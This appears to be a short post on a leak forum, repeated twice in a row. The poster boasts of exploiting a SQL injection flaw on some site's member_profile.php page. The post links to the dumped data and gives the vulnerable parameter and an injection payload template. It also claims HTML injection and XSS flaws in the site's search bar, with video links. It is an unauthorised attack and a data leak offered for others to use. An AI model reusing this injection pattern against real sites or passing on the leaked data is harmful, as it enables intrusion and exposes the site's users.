23-07-25, 06:08 AM
shit leak I know but This was just a SQLI vuln I exploited because I was bored
DATA: snippet.host/oatryu/raw
SQLI info:
Method: GET
Path: /member_profile.php
Query: u_opt=bG9naW4+and(<query>)--+-Exxn
Header: Content-Type: text/
Theres also an HTML injection vulnerability inside the search bar: files.catbox.moe/6p0os5.mp4
As well as XSS: https://files.catbox.moe/9pztl5.mp4
DATA: snippet.host/oatryu/raw
SQLI info:
Method: GET
Path: /member_profile.php
Query: u_opt=bG9naW4+and(<query>)--+-Exxn
Header: Content-Type: text/
Theres also an HTML injection vulnerability inside the search bar: files.catbox.moe/6p0os5.mp4
As well as XSS: https://files.catbox.moe/9pztl5.mp4
